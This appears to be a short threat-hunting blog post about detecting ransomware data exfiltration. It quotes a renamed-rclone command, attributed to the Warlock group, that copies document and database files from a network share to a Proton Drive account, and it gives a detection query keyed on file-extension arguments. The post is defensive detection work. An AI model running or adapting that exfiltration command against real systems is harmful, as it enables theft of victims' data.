233. Another Tool - Same Detecton Opportunity
Hello everyone!
Yesterday we looked at how Qilin ransomware gang abused s5cmd to exfiltrate sensitive data from compromised systems. Today we'll look at abother example to understand that the same detections may be applied to various cases.
This time we'll look at another very popular tool for data exfiltration - rclone. Here's how Warlock used this tool:
TrendSecurity[.]exe copy \\{UNC Path}\ mydrive:/client_42 --protondrive-username [Email] --protondrive-password [Password] -P --include "*.{txt,pdf,csv,accdb,doc,docx,xlsx,mdf,sql,doc,xls,sql,jpg,png,jpeg,sqlite,db,sqlite3,sdf,ndf,ldf,csv,mdf,dbf,ibd,myd,ppt,pptx}" -q --ignore-existing --auto-confirm --multi-thread-streams 11 --transfers 11 --max-age 200d --max-size 3000m
As you can see, here we have very similar command line arguments, so we can use the same query:
event_type: "processcreatewin"
AND
cmdline: ("include" AND "pdf" AND "xls" AND "doc")
Comments
Post a Comment